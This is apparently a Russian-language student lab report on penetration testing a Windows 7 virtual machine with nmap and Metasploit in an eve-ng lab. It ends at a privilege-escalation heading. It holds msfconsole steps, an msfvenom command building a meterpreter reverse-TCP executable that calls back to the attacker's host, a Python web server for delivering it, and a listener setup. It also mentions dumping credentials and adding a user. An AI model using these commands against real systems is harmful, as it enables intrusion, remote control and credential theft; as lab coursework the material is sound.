# Практическая работа №3 ## Задание https://sadykov.notion.site/3-MetaSplot-Framework-6552f5b12c7d4d9094a1b8f727df76f1 Построить инфраструктуру в eve-ng, пробросить порты. Просканировать с помощью nmap. Используя metasploit получить доступ к витруальной машине windows 7, создать нового пользователя, сделать скриншот рабочего стола, получить все учетные записи, находящиеся в памяти системы, выполнить проксирование трафика во внутреннюю инфраструктуру. ## Подготовка ### Термины: - exploit - механизм, эксплуатирующий уязвимость - auxiliary - проверяет, есть ли уязвимость для указанного эксплойта - post - позволяет после эксплуатирования уязвимости выполнить ряд действий - payload - вредоносная программа, выполняющаяся на взломанном устройстве после экспуатации уязвимости - encoder - скрывает payload от антивирусных программ - nops - позволяет скрыть свое поведение от эвристического анализатора (дословная цитата) - evasion - позволяет внести коррективы в действия загруженной вредоносной программы ![](https://i.imgur.com/9HqAjrh.png) Инфраструктура сети. ## Проброс портов ![](https://i.imgur.com/45XIWv8.png) Проброшенные 445 и 3389 порты. ## Сканирование портов ![](https://i.imgur.com/ikqTd9x.png) Результат сканирования. ## Запуск эксплойта ### Порядок действий таков: - msfconsole, после этого можно поискать эксплойты для найденных nmap сервисов. - search <название уязвимости, службы, чего угодно, что нашел nmap> - use <номер из списка> - show options (смотрим, все ли так, как нам нужно) - если что-то не так, set <название параметра> <значение> (set rhosts <целевой ip>) - run (запуск эксплойта, пэйлоад выберется автоматически) - выйти из meterpreter, чтобы попробовать еще раз или изменить настройки bg - show targets посмотреть упомянутые таргеты - show payloads совместимые payloadы ![](https://i.imgur.com/BPmGLRz.png) ## Вторая часть Создание пользователя NEWUSER eve@123: ![](https://i.imgur.com/N9kEKjp.png) ![](https://i.imgur.com/NuJO89S.png) Скриншот экрана ![](https://i.imgur.com/a0h6OV8.png) Учетные записи ![](https://i.imgur.com/Dok9cUO.png) ## msfvenom Позволяет получить нужный payload по названию. `msfvenom -p <название> LHOST=<ip kali> LPORT=<порт> -f <расширение> -o <результат>` ### Создание payload `msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.129.134 -f exe -o meterpreter.exe` Создает reverse tcp payload в формате exe программы для windows x64 ### Передача payload на уязвимый компьютер Как вариант можно воспользоваться python simplehttpserver. `python -m http.server 80` ### Настройка сервера на kali Для того, чтобы загруженному на компьютер жертвы reverse_tcp было куда подключаться, поднимем сервер на нашей машине. Для этого можно использовать exploit/multi/handler. Нужно указать, с какого payload к нему будут подключаться, а так же прослушиваемый адрес (интерфейс), установим туда 0.0.0.0, чтобы слушалось все. ``` use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set lhost 0.0.0.0 run ``` После этого мы получаем терминал компьютера жертвы. Так, гипотетически, жертва сама загрузила себе на компьютер RAT. ### Повышение прав